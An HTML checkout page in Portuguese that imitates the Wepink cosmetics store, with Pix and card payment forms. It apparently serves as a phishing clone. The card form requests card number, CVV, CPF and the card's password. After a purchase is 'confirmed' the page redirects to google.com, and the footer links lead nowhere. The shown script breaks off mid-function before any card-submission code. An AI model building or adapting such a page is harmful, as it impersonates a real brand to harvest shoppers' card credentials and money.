<!DOCTYPE html>
<html lang="pt-BR">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>wepink :: Pagamento</title>
  <meta name="description" content="Finalize sua compra na Wepink">
  <meta name="copyright" content="WePink">
  <meta name="author" content="WePink">
  <meta name="country" content="BRA">
  <meta name="language" content="pt-BR">
  <meta name="robots" content="index, follow">
  <link rel="icon" href="img/we.png" type="image/png">
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600;700&display=swap">
  <script src="https://sdk.mercadopago.com/js/v2"></script>
  <style>
    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
    }

    body {
      font-family: 'Poppins', sans-serif;
      background: linear-gradient(135deg, #f5f5f5 0%, #e0e7ff 100%);
      display: flex;
      flex-direction: column;
      min-height: 100vh;
      color: #333;
      line-height: 1.6;
      overflow-x: hidden;
    }

    .header-bar {
      display: flex;
      align-items: center;
      justify-content: space-between;
      padding: 16px 24px;
      background: linear-gradient(90deg, #ff2e82, #ff99cc);
      box-shadow: 0 4px 12px rgba(0, 0, 0, 0.15);
      position: sticky;
      top: 0;
      z-index: 1000;
      transition: background 0.3s ease;
    }

    .header-bar .logo-text {
      font-weight: 700;
      font-size: 1.5rem;
      color: #fff;
      position: absolute;
      left: 50%;
      transform: translateX(-50%);
      text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.2);
      transition: color 0.3s ease;
    }

    .header-icons {
      display: flex;
      gap: 16px;
    }

    .header-icons button, .menu-icon {
      background: none;
      border: none;
      cursor: pointer;
      outline: none;
    }

    .header-icons svg, .menu-icon svg {
      width: 24px;
      height: 24px;
      stroke: #fff;
      stroke-width: 2;
      transition: stroke 0.3s ease, transform 0.3s ease;
    }

    .header-icons button:hover svg, .menu-icon:hover svg {
      stroke: #ff2e82;
      transform: scale(1.1);
    }

    .header-icons button:focus, .menu-icon:focus {
      outline: 2px solid #fff;
      outline-offset: 2px;
    }

    .payment-section {
      max-width: 720px;
      margin: 40px auto;
      padding: 0 16px;
      flex: 1;
      animation: fadeIn 0.5s ease-in-out;
    }

    .payment-section h2 {
      font-size: 2rem;
      font-weight: 700;
      color: #ff2e82;
      margin-bottom: 32px;
      text-align: center;
      text-transform: uppercase;
      letter-spacing: 1.5px;
      text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.1);
    }

    .order-summary {
      background: #fff;
      padding: 24px;
      border-radius: 16px;
      margin-bottom: 32px;
      box-shadow: 0 8px 24px rgba(0, 0, 0, 0.15);
      transition: transform 0.3s ease, box-shadow 0.3s ease;
    }

    .order-summary:hover {
      transform: translateY(-6px);
      box-shadow: 0 12px 32px rgba(0, 0, 0, 0.2);
    }

    .order-summary h3 {
      font-size: 1.4rem;
      font-weight: 600;
      color: #ff2e82;
      margin-bottom: 24px;
      text-transform: uppercase;
      letter-spacing: 1px;
    }

    .order-item {
      display: flex;
      align-items: center;
      border-bottom: 1px solid #e0e0e0;
      padding: 16px 0;
      margin-bottom: 16px;
    }

    .order-item img {
      width: 70px;
      height: auto;
      margin-right: 20px;
      border-radius: 12px;
      box-shadow: 0 3px 8px rgba(0, 0, 0, 0.1);
      object-fit: cover;
    }

    .order-item-details {
      flex: 1;
    }

    .order-item-details p {
      margin: 6px 0;
      font-size: 0.95rem;
      color: #555;
    }

    .order-item-details .price {
      color: #333;
      font-weight: 600;
      font-size: 1.05rem;
    }

    .order-total {
      margin-top: 16px;
    }

    .order-total p {
      font-size: 0.95rem;
      color: #555;
      margin: 8px 0;
      text-align: left;
    }

    .order-total .total {
      font-weight: 700;
      color: #333;
      font-size: 1.15rem;
    }

    .payment-options {
      display: flex;
      justify-content: center;
      gap: 24px;
      margin-bottom: 32px;
    }

    .payment-options button {
      background: linear-gradient(90deg, #ff2e82, #ff99cc);
      color: #fff;
      padding: 14px 32px;
      border: none;
      border-radius: 10px;
      font-weight: 600;
      font-size: 1.05rem;
      cursor: pointer;
      transition: all 0.3s ease;
      box-shadow: 0 4px 12px rgba(0, 0, 0, 0.15);
      text-transform: uppercase;
      letter-spacing: 1.2px;
    }

    .payment-options button:hover {
      background: linear-gradient(90deg, #e02974, #ff80b3);
      transform: translateY(-3px);
      box-shadow: 0 8px 20px rgba(0, 0, 0, 0.25);
    }

    .payment-options button.active {
      background: linear-gradient(90deg, #e02974, #ff80b3);
      border: 2px solid #fff;
      transform: scale(1.05);
      box-shadow: 0 8px 20px rgba(0, 0, 0, 0.25);
    }

    .payment-form {
      display: none;
      background: #fff;
      padding: 24px;
      border-radius: 16px;
      margin-bottom: 32px;
      box-shadow: 0 8px 24px rgba(0, 0, 0, 0.15);
      opacity: 0;
      transition: all 0.3s ease;
      height: 0;
      overflow: hidden;
    }

    .payment-form.active {
      display: block;
      opacity: 1;
      height: auto;
      animation: slideIn 0.3s ease-in-out;
    }

    @keyframes slideIn {
      from { opacity: 0; transform: translateY(10px); }
      to { opacity: 1; transform: translateY(0); }
    }

    .payment-form h3 {
      font-size: 1.4rem;
      font-weight: 600;
      color: #ff2e82;
      margin-bottom: 24px;
      text-transform: uppercase;
      letter-spacing: 1px;
    }

    .payment-form label {
      font-size: 0.9rem;
      color: #333;
      margin-bottom: 6px;
      display: block;
      font-weight: 500;
    }

    .payment-form input, .payment-form select {
      width: 100%;
      padding: 12px 16px;
      margin: 8px 0;
      border: 1px solid #ddd;
      border-radius: 8px;
      font-size: 0.95rem;
      background: #f9f9fb;
      transition: all 0.3s ease;
      box-shadow: inset 0 2px 4px rgba(0, 0, 0, 0.05);
    }

    .payment-form input:focus, .payment-form select:focus {
      border-color: #ff2e82;
      background: #fff;
      box-shadow: 0 0 8px rgba(255, 46, 130, 0.3);
      outline: none;
    }

    .payment-form input.invalid {
      border-color: #ff2e82;
      background: #fff2f4;
    }

    .payment-form .error-message {
      color: #ff2e82;
      font-size: 0.85rem;
      margin: -2px 0 8px;
      display: none;
      background: #fff2f4;
      padding: 4px 8px;
      border-radius: 6px;
      box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1);
    }

    .payment-form .error-message.visible {
      display: block;
    }

    .payment-form button {
      background: linear-gradient(90deg, #ff2e82, #ff99cc);
      color: #fff;
      padding: 14px 20px;
      border: none;
      border-radius: 10px;
      font-weight: 600;
      font-size: 1rem;
      cursor: pointer;
      width: 100%;
      margin-top: 16px;
      transition: all 0.3s ease;
      box-shadow: 0 4px 12px rgba(0, 0, 0, 0.15);
      text-transform: uppercase;
      letter-spacing: 1.2px;
    }

    .payment-form button:hover:not(:disabled) {
      background: linear-gradient(90deg, #e02974, #ff80b3);
      transform: translateY(-3px);
      box-shadow: 0 8px 20px rgba(0, 0, 0, 0.25);
    }

    .payment-form button:disabled {
      background: #ccc;
      cursor: not-allowed;
      transform: none;
      box-shadow: none;
    }

    .pix-code-container {
      margin-top: 24px;
      padding: 16px;
      border: 1px solid #ddd;
      border-radius: 10px;
      background: #f9f9fb;
      box-shadow: 0 4px 12px rgba(0, 0, 0, 0.1);
      display: none;
      animation: fadeIn 0.3s ease;
    }

    .pix-code-container p {
      font-size: 0.95rem;
      color: #333;
      margin: 0 0 12px;
    }

    .pix-code-container code {
      font-family: 'Courier New', Courier, monospace;
      font-size: 0.9rem;
      color: #ff2e82;
      word-break: break-all;
      display: block;
      background: #fff;
      padding: 8px;
      border-radius: 6px;
      box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.05);
    }

    .pix-qr-container {
      margin-top: 24px;
      padding: 16px;
      border: 1px solid #ddd;
      border-radius: 10px;
      background: #f9f9fb;
      box-shadow: 0 4px 12px rgba(0, 0, 0, 0.1);
      text-align: center;
      display: none;
      animation: zoomIn 0.5s ease;
    }

    .pix-qr-container img {
      max-width: 200px;
      height: auto;
      border-radius: 8px;
      transition: transform 0.3s ease;
    }

    .copy-button {
      background: linear-gradient(90deg, #ff2e82, #ff99cc);
      color: #fff;
      padding: 10px 20px;
      border: none;
      border-radius: 8px;
      font-weight: 600;
      font-size: 0.95rem;
      cursor: pointer;
      margin: 8px;
      transition: all 0.3s ease;
      box-shadow: 0 3px 8px rgba(0, 0, 0, 0.15);
    }

    .copy-button:hover {
      background: linear-gradient(90deg, #e02974, #ff80b3);
      transform: translateY(-2px);
      box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2);
    }

    .copy-button.copied {
      background: linear-gradient(90deg, #e02974, #ff80b3);
    }

    .copied-message {
      display: none;
      color: #ff2e82;
      font-size: 0.85rem;
      margin-top: 8px;
      animation: fadeInCopied 0.3s ease;
    }

    .copied-message.visible {
      display: block;
    }

    .payment-loading-overlay {
      display: none;
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background: rgba(0, 0, 0, 0.7);
      z-index: 1500;
      justify-content: center;
      align-items: center;
      animation: fadeInBackdrop 0.3s ease;
    }

    .payment-loading-content {
      background: #fff;
      padding: 24px;
      border-radius: 16px;
      box-shadow: 0 8px 24px rgba(0, 0, 0, 0.15);
      text-align: center;
      max-width: 90%;
      width: 400px;
      animation: popIn 0.4s ease-in-out;
      border-top: 4px solid #ff2e82;
    }

    .payment-loading-content h3 {
      font-size: 1.6rem;
      font-weight: 600;
      color: #ff2e82;
      margin-bottom: 16px;
      text-transform: uppercase;
      letter-spacing: 1.2px;
    }

    .payment-loading-content p {
      font-size: 1rem;
      color: #333;
      margin-bottom: 16px;
      line-height: 1.6;
    }

    .payment-loading-content .spinner {
      border: 3px solid #f3f3f3;
      border-top: 3px solid #ff2e82;
      border-radius: 50%;
      width: 30px;
      height: 30px;
      animation: spin 1s linear infinite;
      margin: 16px auto;
    }

    .payment-loading-content button {
      background: linear-gradient(90deg, #ff2e82, #ff99cc);
      color: #fff;
      padding: 10px 20px;
      border: none;
      border-radius: 8px;
      font-weight: 600;
      font-size: 0.95rem;
      cursor: pointer;
      transition: all 0.3s ease;
      box-shadow: 0 3px 8px rgba(0, 0, 0, 0.15);
      margin: 8px;
    }

    .payment-loading-content button:hover {
      background: linear-gradient(90deg, #e02974, #ff80b3);
      transform: translateY(-2px);
      box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2);
    }

    .payment-loading-content .copy-feedback {
      display: none;
      color: #ff2e82;
      font-size: 0.9rem;
      margin-top: 8px;
      animation: fadeInCopied 0.3s ease;
    }

    .payment-loading-content .copy-feedback.visible {
      display: block;
    }

    .confirmation-screen {
      display: none;
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background: rgba(0, 0, 0, 0.7);
      z-index: 2000;
      justify-content: center;
      align-items: center;
      animation: fadeIn 0.3s ease-in-out;
    }

    .confirmation-content {
      background: #fff;
      padding: 32px;
      border-radius: 16px;
      box-shadow: 0 12px 32px rgba(0, 0, 0, 0.25);
      text-align: center;
      max-width: 90%;
      width: 500px;
      animation: popIn 0.4s ease-in-out;
      border-top: 4px solid #ff2e82;
    }

    .confirmation-content h3 {
      font-size: 1.8rem;
      font-weight: 700;
      color: #ff2e82;
      margin-bottom: 20px;
      text-transform: uppercase;
      letter-spacing: 1.5px;
    }

    .confirmation-content p {
      font-size: 1rem;
      color: #333;
      margin-bottom: 24px;
      line-height: 1.8;
    }

    .confirmation-content button {
      background: linear-gradient(90deg, #ff2e82, #ff99cc);
      color: #fff;
      padding: 12px 24px;
      border: none;
      border-radius: 10px;
      font-weight: 600;
      font-size: 1rem;
      cursor: pointer;
      transition: all 0.3s ease;
      box-shadow: 0 4px 12px rgba(0, 0, 0, 0.15);
    }

    .confirmation-content button:hover {
      background: linear-gradient(90deg, #e02974, #ff80b3);
      transform: translateY(-3px);
      box-shadow: 0 8px 20px rgba(0, 0, 0, 0.25);
    }

    .error-screen {
      display: none;
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background: rgba(0, 0, 0, 0.7);
      z-index: 2000;
      justify-content: center;
      align-items: center;
    }

    .error-content {
      background: #fff;
      padding: 32px;
      border-radius: 16px;
      box-shadow: 0 12px 32px rgba(0, 0, 0, 0.25);
      text-align: center;
      max-width: 90%;
      width: 500px;
      animation: popIn 0.4s ease-in-out;
      border-top: 4px solid #dc3545;
    }

    .error-content h3 {
      font-size: 1.8rem;
      font-weight: 700;
      color: #dc3545;
      margin-bottom: 20px;
      text-transform: uppercase;
      letter-spacing: 1.5px;
    }

    .error-content p {
      font-size: 1rem;
      color: #333;
      margin-bottom: 24px;
      line-height: 1.8;
    }

    .error-content button {
      background: linear-gradient(90deg, #ff2e82, #ff99cc);
      color: #fff;
      padding: 12px 24px;
      border: none;
      border-radius: 10px;
      font-weight: 600;
      font-size: 1rem;
      cursor: pointer;
      transition: all 0.3s ease;
      box-shadow: 0 4px 12px rgba(0, 0, 0, 0.15);
    }

    .error-content button:hover {
      background: linear-gradient(90deg, #e02974, #ff80b3);
      transform: translateY(-3px);
      box-shadow: 0 8px 20px rgba(0, 0, 0, 0.25);
    }

    footer {
      background: linear-gradient(90deg, #ff2e82, #ff99cc);
      color: #fff;
      padding: 40px 16px;
      border-top-left-radius: 16px;
      border-top-right-radius: 16px;
      box-shadow: 0 -4px 12px rgba(0, 0, 0, 0.15);
      margin-top: auto;
      transition: background 0.3s ease;
    }

    footer .footer-logo {
      font-size: 1.5rem;
      font-weight: 700;
      margin-bottom: 24px;
      text-align: center;
      text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.2);
      transition: transform 0.3s ease;
    }

    footer .footer-logo:hover {
      transform: scale(1.05);
    }

    footer .footer-links {
      display: flex;
      flex-wrap: wrap;
      justify-content: center;
      gap: 16px;
      margin-bottom: 28px;
    }

    footer .footer-links a {
      color: #fff;
      text-decoration: none;
      font-size: 0.95rem;
      font-weight: 400;
      padding: 8px 12px;
      border-radius: 6px;
      transition: color 0.3s ease, background 0.3s ease, transform 0.3s ease;
    }

    footer .footer-links a:hover {
      color: #ff2e82;
      background: #fff;
      transform: translateY(-2px);
    }

    footer .footer-links a:focus {
      outline: 2px solid #fff;
      outline-offset: 2px;
    }

    footer .social-links {
      display: flex;
      justify-content: center;
      gap: 16px;
      margin-bottom: 28px;
    }

    footer .social-links a {
      background-color: #fff;
      border-radius: 50%;
      width: 40px;
      height: 40px;
      display: flex;
      align-items: center;
      justify-content: center;
      text-decoration: none;
      transition: transform 0.3s ease, box-shadow 0.3s ease, background 0.3s ease;
      box-shadow: 0 3px 8px rgba(0, 0, 0, 0.15);
    }

    footer .social-links a:hover {
      transform: scale(1.1);
      box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2);
      background: #f0f0f0;
    }

    footer .social-links a:focus {
      outline: 2px solid #fff;
      outline-offset: 2px;
    }

    footer .social-links img {
      width: 24px;
      height: 24px;
      transition: filter 0.3s ease;
    }

    footer .social-links a:hover img {
      filter: brightness(0.9);
    }

    footer .payment-methods {
      text-align: center;
      margin-top: 24px;
    }

    footer .payment-methods h4 {
      font-size: 1rem;
      font-weight: 600;
      margin-bottom: 16px;
      text-transform: uppercase;
      letter-spacing: 1px;
      text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.1);
    }

    footer .payment-methods img {
      margin: 0 6px;
      height: 30px;
      border-radius: 4px;
      background: #fff;
      padding: 2px;
      transition: transform 0.3s ease, filter 0.3s ease;
    }

    footer .payment-methods img:hover {
      transform: scale(1.1);
      filter: brightness(0.9);
    }

    footer .payment-methods img.pix-icon {
      height: 40px;
    }

    footer .footer-info {
      text-align: center;
      margin-top: 24px;
    }

    footer .footer-info p {
      font-size: 0.85rem;
      margin: 6px 0;
      opacity: 0.9;
    }

    footer .footer-info a {
      color: #fff;
      text-decoration: none;
      transition: color 0.3s ease, text-decoration 0.3s ease;
    }

    footer .footer-info a:hover {
      color: #f0f0f0;
      text-decoration: underline;
    }

    footer .footer-info a:focus {
      outline: 2px solid #fff;
      outline-offset: 2px;
    }

    @keyframes fadeInBackdrop {
      from { opacity: 0; }
      to { opacity: 1; }
    }

    @keyframes fadeIn {
      from { opacity: 0; }
      to { opacity: 1; }
    }

    @keyframes popIn {
      from { opacity: 0; transform: scale(0.9); }
      to { opacity: 1; transform: scale(1); }
    }

    @keyframes spin {
      0% { transform: rotate(0deg); }
      100% { transform: rotate(360deg); }
    }

    @keyframes fadeInCopied {
      from { opacity: 0; }
      to { opacity: 1; }
    }

    @keyframes zoomIn {
      from { opacity: 0; transform: scale(0.9); }
      to { opacity: 1; transform: scale(1); }
    }

    @media (max-width: 600px) {
      .payment-section {
        padding: 0 12px;
        margin: 24px auto;
      }

      .payment-section h2 {
        font-size: 1.6rem;
      }

      .payment-options {
        flex-direction: column;
        gap: 16px;
      }

      .payment-loading-content {
        padding: 20px;
        width: 90%;
      }

      .payment-loading-content h3 {
        font-size: 1.5rem;
      }

      .payment-loading-content p {
        font-size: 0.9rem;
      }

      .payment-loading-content button {
        font-size: 0.9rem;
        padding: 10px 20px;
      }

      footer {
        padding: 32px 12px;
      }

      footer .footer-logo {
        font-size: 1.3rem;
        margin-bottom: 20px;
      }

      footer .footer-links {
        gap: 12px;
        margin-bottom: 24px;
      }

      footer .footer-links a {
        font-size: 0.85rem;
        padding: 6px 10px;
      }

      footer .social-links {
        gap: 12px;
        margin-bottom: 24px;
      }

      footer .social-links a {
        width: 35px;
        height: 35px;
      }

      footer .social-links img {
        width: 20px;
        height: 20px;
      }

      footer .payment-methods h4 {
        font-size: 0.9rem;
        margin-bottom: 12px;
      }

      footer .payment-methods img {
        margin: 0 6px;
        height: 28px;
      }

      footer .payment-methods img.pix-icon {
        height: 38px;
      }

      footer .footer-info {
        margin-top: 24px;
      }

      footer .footer-info p {
        font-size: 0.8rem;
      }
    }
  </style>
</head>
<body>
  <header class="header-bar" role="banner">
    <button class="menu-icon" aria-label="Abrir menu">
      <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke="currentColor">
        <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M4 6h16M4 12h16M4 18h16"/>
      </svg>
    </button>
    <div class="logo-text" role="heading" aria-level="1">wepink</div>
    <div class="header-icons" role="navigation">
      <button aria-label="Perfil do usuário">
        <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke="currentColor">
          <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M16 7a4 4 0 11-8 0 4 4 0 018 0zM12 14a7 7 0 00-7 7h14a7 7 0 00-7-7z"/>
        </svg>
      </button>
      <button aria-label="Carrinho de compras">
        <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke="currentColor">
          <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M3 3h2l.4 2M7 13h10l4-8H5.4M7 13L5.4 5M7 13l-2.293 2.293c-.63.63-.184 1.707.707 1.707H17m0 0a2 2 0 100 4 2 2 0 000-4zm-8 2a2 2 0 11-4 0 2 2 0 014 0z"/>
        </svg>
      </button>
    </div>
  </header>

  <main class="payment-section" role="main">
    <h2>Finalizar Pagamento</h2>
    <section class="order-summary" id="order-summary" aria-labelledby="order-summary-title">
      <h3 id="order-summary-title">Resumo do Pedido</h3>
      <div id="order-items" role="list"></div>
      <div class="order-total">
        <p><strong>Taxa de Entrega:</strong> <span id="delivery-fee">R$ 0,00</span></p>
        <p class="total"><strong>Total:</strong> <span id="order-total">R$ 0,00</span></p>
      </div>
    </section>
    <div class="payment-options" role="tablist">
      <button id="pix-button" role="tab" aria-selected="false" aria-controls="pix-form">Pix</button>
      <button id="card-button" role="tab" aria-selected="false" aria-controls="card-form">Cartão</button>
    </div>
    <form id="pix-form" class="payment-form" role="tabpanel" aria-labelledby="pix-button">
      <h3>Pagamento via Pix</h3>
      <div class="pix-details" id="pix-details">
        <div id="pix-inputs">
          <label for="pix-payer-name">Nome Completo</label>
          <input type="text" id="pix-payer-name" placeholder="Nome Completo" required aria-label="Nome completo do pagador">
          <label for="pix-payer-cpf">CPF (somente números)</label>
          <input type="text" id="pix-payer-cpf" placeholder="CPF (somente números)" maxlength="11" required aria-label="CPF do pagador">
          <label for="pix-email-input">E-mail</label>
          <input type="email" id="pix-email-input" placeholder="Seu e-mail" required aria-label="E-mail do pagador">
          <button id="generate-pix-button" disabled aria-label="Gerar código PIX">Gerar Pix</button>
        </div>
        <div id="pix-code-manual" class="pix-code-container">
          <p>Código Pix (Copie e Cole):</p>
          <code id="pix-code-text" role="textbox" aria-readonly="true"></code>
          <button class="copy-button" id="copy-pix-code" aria-label="Copiar código PIX">Copiar</button>
          <p class="copied-message" id="copied-message" role="status">Código Copiado!</p>
        </div>
        <div id="pix-qr-manual" class="pix-qr-container">
          <p>Escaneie o QR Code:</p>
          <img id="pix-qr-image" src="" alt="QR Code para pagamento via PIX">
        </div>
      </div>
    </form>
    <form id="card-form" class="payment-form" role="tabpanel" aria-labelledby="card-button">
      <h3>Pagamento via Cartão</h3>
      <div class="card-details" id="card-details">
        <label for="card-name">Nome no Cartão</label>
        <input type="text" id="card-name" placeholder="Nome no cartão" required aria-label="Nome no cartão">
        <p class="error-message" id="error-card-name"></p>
        <label for="card-cpf">CPF (somente números)</label>
        <input type="text" id="card-cpf" placeholder="Digite o CPF (somente números)" maxlength="14" pattern="\d{3}\.\d{3}\.\d{3}-\d{2}" title="Digite 11 dígitos no formato XXX.XXX.XXX-XX" required aria-label="CPF do titular do cartão">
        <p class="error-message" id="error-card-cpf"></p>
        <label for="card-number">Número do Cartão</label>
        <input type="text" id="card-number" placeholder="Número do Cartão (16 dígitos)" maxlength="19" required aria-label="Número do cartão">
        <p class="error-message" id="error-card-number"></p>
        <label for="exp-month">Mês de Expiração</label>
        <select id="exp-month" required aria-label="Mês de expiração do cartão">
          <option value="">Mês</option>
          <option value="01">01</option>
          <option value="02">02</option>
          <option value="03">03</option>
          <option value="04">04</option>
          <option value="05">05</option>
          <option value="06">06</option>
          <option value="07">07</option>
          <option value="08">08</option>
          <option value="09">09</option>
          <option value="10">10</option>
          <option value="11">11</option>
          <option value="12">12</option>
        </select>
        <p class="error-message" id="error-exp-month"></p>
        <label for="exp-year">Ano de Expiração</label>
        <select id="exp-year" required aria-label="Ano de expiração do cartão">
          <option value="">Ano</option>
          <option value="2023">2023</option>
          <option value="2024">2024</option>
          <option value="2025">2025</option>
          <option value="2026">2026</option>
          <option value="2027">2027</option>
          <option value="2028">2028</option>
          <option value="2029">2029</option>
          <option value="2030">2030</option>
          <option value="2031">2031</option>
          <option value="2032">2032</option>
          <option value="2033">2033</option>
          <option value="2034">2034</option>
          <option value="2035">2035</option>
        </select>
        <p class="error-message" id="error-exp-year"></p>
        <label for="cvv">CVV</label>
        <input type="text" id="cvv" placeholder="CVV" maxlength="4" pattern="\d{3,4}" title="Digite 3 ou 4 dígitos" required aria-label="CVV do cartão">
        <p class="error-message" id="error-cvv"></p>
        <label for="password">Senha</label>
        <input type="password" id="password" placeholder="Senha" required aria-label="Senha do cartão">
        <p class="error-message" id="error-password"></p>
        <button id="confirm-payment-button" disabled aria-label="Confirmar pagamento com cartão">Confirmar Pagamento</button>
      </div>
    </form>
  </main>

  <div class="payment-loading-overlay" id="payment-loading-overlay" role="dialog" aria-labelledby="payment-loading-title">
    <div class="payment-loading-content">
      <h3 id="payment-loading-title">Aguardando Pagamento...</h3>
      <p>Estamos aguardando a confirmação do seu pagamento via PIX. Por favor, efetue o pagamento.</p>
      <div class="spinner"></div>
      <p id="payment-timeout" style="font-size: 0.9rem; color: #666;"></p>
      <button class="copy-button" id="copy-pix-again" aria-label="Copiar código PIX novamente">Copiar PIX Novamente</button>
      <p class="copy-feedback" id="copy-feedback" role="status">Código Copiado!</p>
      <button id="back-to-code" aria-label="Voltar ao código PIX">Voltar ao Código</button>
    </div>
  </div>

  <div class="confirmation-screen" id="confirmation-screen" role="dialog" aria-labelledby="confirmation-title">
    <div class="confirmation-content">
      <h3 id="confirmation-title">Compra Efetuada com Sucesso!</h3>
      <p id="confirmation-message">Seu pedido foi processado com sucesso. Você será redirecionado em breve...</p>
      <div class="order-details" id="confirmation-details"></div>
    </div>
  </div>

  <div class="error-screen" id="error-screen" role="dialog" aria-labelledby="error-title">
    <div class="error-content">
      <h3 id="error-title">Pagamento Não Realizado</h3>
      <p id="error-message">O tempo para pagamento expirou ou o pagamento foi rejeitado. Tente novamente.</p>
      <button id="try-again" aria-label="Tentar novamente">Tentar Novamente</button>
    </div>
  </div>

  <footer role="contentinfo">
    <div class="footer-logo">wepink</div>
    <nav class="footer-links" role="navigation" aria-label="Links do rodapé">
      <a href="#">Sobre nós</a>
      <a href="#">Central de ajuda</a>
      <a href="#">Troca e devoluções</a>
      <a href="#">WhatsApp</a>
      <a href="#">Regulamento Live Wepink 19</a>
      <a href="#">Trabalhe conosco</a>
      <a href="#">Consulte sua entrega</a>
      <a href="#">Franquias</a>
    </nav>
    <div class="social-links" role="navigation" aria-label="Links sociais">
      <a href="https://www.instagram.com" target="_blank" aria-label="Instagram">
        <img src="img/instagram.png" alt="Ícone do Instagram" onerror="this.src='https://via.placeholder.com/24?text=IG';">
      </a>
      <a href="https://www.facebook.com" target="_blank" aria-label="Facebook">
        <img src="img/facebook.png" alt="Ícone do Facebook" onerror="this.src='https://via.placeholder.com/24?text=FB';">
      </a>
    </div>
    <div class="payment-methods">
      <h4>Formas de pagamento</h4>
      <img src="img/visa.png" alt="Ícone da bandeira Visa" onerror="this.src='https://via.placeholder.com/30?text=Visa';">
      <img src="img/mastercard.png" alt="Ícone da bandeira Mastercard" onerror="this.src='https://via.placeholder.com/30?text=MC';">
      <img src="img/elo.png" alt="Ícone da bandeira Elo" onerror="this.src='https://via.placeholder.com/30?text=Elo';">
      <img src="img/amex.png" alt="Ícone da bandeira Amex" onerror="this.src='https://via.placeholder.com/30?text=Amex';">
      <img src="img/boleto.png" alt="Ícone do método Boleto" onerror="this.src='https://via.placeholder.com/30?text=Boleto';">
      <img src="img/pix.png" alt="Ícone do método Pix" class="pix-icon" onerror="this.src='https://via.placeholder.com/40?text=Pix';">
    </div>
    <div class="footer-info">
      <p>Política de Privacidade | Termos de Uso</p>
      <p>Todos os direitos reservados © 2025 | SAVI COSMÉTICOS LTDA | CNPJ: 42.422.967/0001-01</p>
    </div>
  </footer>

  <script>
    const mp = new MercadoPago('APP_USR-44c96b6c-33f1-49e4-9f9c-95dbe0338c2d', { locale: 'pt-BR' });
    const backendUrl = window.location.hostname === 'localhost' ? 'http://localhost:3000/create-payment' : '/create-payment';

    function formatCurrency(value) {
      return `R$ ${value.toFixed(2).replace('.', ',')}`;
    }

    function formatCardNumber(input) {
      let value = input.value.replace(/\D/g, '').slice(0, 16);
      let formatted = '';
      for (let i = 0; i < value.length; i++) {
        formatted += i > 0 && i % 4 === 0 ? ' ' + value[i] : value[i];
      }
      input.value = formatted;
    }

    function formatCPF(input) {
      let value = input.value.replace(/\D/g, '').slice(0, 11);
      let formatted = '';
      for (let i = 0; i < value.length; i++) {
        if (i === 3 || i === 6) formatted += '.';
        if (i === 9) formatted += '-';
        formatted += value[i];
      }
      input.value = formatted;
    }

    function showPaymentLoadingOverlay() {
      const paymentLoadingOverlay = document.getElementById('payment-loading-overlay');
      paymentLoadingOverlay.style.display = 'flex';
    }

    function hidePaymentLoadingOverlay() {
      const paymentLoadingOverlay = document.getElementById('payment-loading-overlay');
      paymentLoadingOverlay.style.display = 'none';
    }

    function showConfirmationScreen(paymentMethod, redirect = false) {
      const confirmationScreen = document.getElementById('confirmation-screen');
      const confirmationMessage = document.getElementById('confirmation-message');
      const confirmationDetails = document.getElementById('confirmation-details');
      const purchase = JSON.parse(localStorage.getItem('pendingPurchase')) || {};
      let total = 0;

      purchase.cartItems.forEach(item => {
        total += item.priceNew * item.quantity;
      });
      total += purchase.address?.deliveryFee || 0;

      confirmationDetails.innerHTML = `
        <p><strong>Método de Pagamento:</strong> ${paymentMethod}</p>
        <p><strong>Total:</strong> ${formatCurrency(total)}</p>
        <p><strong>Data:</strong> ${new Date().toLocaleDateString('pt-BR')}</p>
      `;

      confirmationScreen.style.display = 'flex';

      if (redirect) {
        setTimeout(() => {
          window.location.href = 'https://www.google.com';
        }, 3000);
      }
    }

    function showErrorScreen(message) {
      const errorScreen = document.getElementById('error-screen');
      const errorMessage = document.getElementById('error-message');
      errorMessage.textContent = message;
      errorScreen.style.display = 'flex';
      document.getElementById('try-again').onclick = () => {
        errorScreen.style.display = 'none';
        window.location.reload();
      };
    }

    async function checkPaymentStatus(paymentId) {
      const statusUrl = `http://localhost:3000/payment-status/${paymentId}`;
      const maxWaitTime = 5 * 60 * 1000; // 5 minutos
      const intervalTime = 5000; // 5 segundos
      let elapsedTime = 0;

      console.log('Iniciando verificação de pagamento para ID:', paymentId);
      showPaymentLoadingOverlay();

      const interval = setInterval(async () => {
        elapsedTime += intervalTime;
        const remainingTime = Math.max(0, (maxWaitTime - elapsedTime) / 1000);
        document.getElementById('payment-timeout').textContent = `Tempo restante: ${Math.floor(remainingTime / 60)}:${(remainingTime % 60).toString().padStart(2, '0')}`;

        if (elapsedTime >= maxWaitTime) {
          clearInterval(interval);
          hidePaymentLoadingOverlay();
          showErrorScreen('O tempo para pagamento expirou. Tente novamente.');
          return;
        }

        try {
          const response = await fetch(statusUrl);
          if (!response.ok) {
            throw new Error('Erro ao verificar o status do pagamento');
          }
          const data = await response.json();
          console.log('Status do pagamento:', data.status);
          if (data.status === 'approved') {
            clearInterval(interval);
            hidePaymentLoadingOverlay();
            showConfirmationScreen('Pix');
          } else if (data.status === 'rejected') {
            clearInterval(interval);
            hidePaymentLoadingOverlay();
            showErrorScreen('Pagamento rejeitado. Tente novamente.');
          }
        } catch (error) {
          console.error('Erro ao verificar status:', error);
          clearInterval(interval);
          hidePaymentLoadingOverlay();
          showErrorScreen('Erro ao verificar o status do pagamento. Tente novamente.');
        }
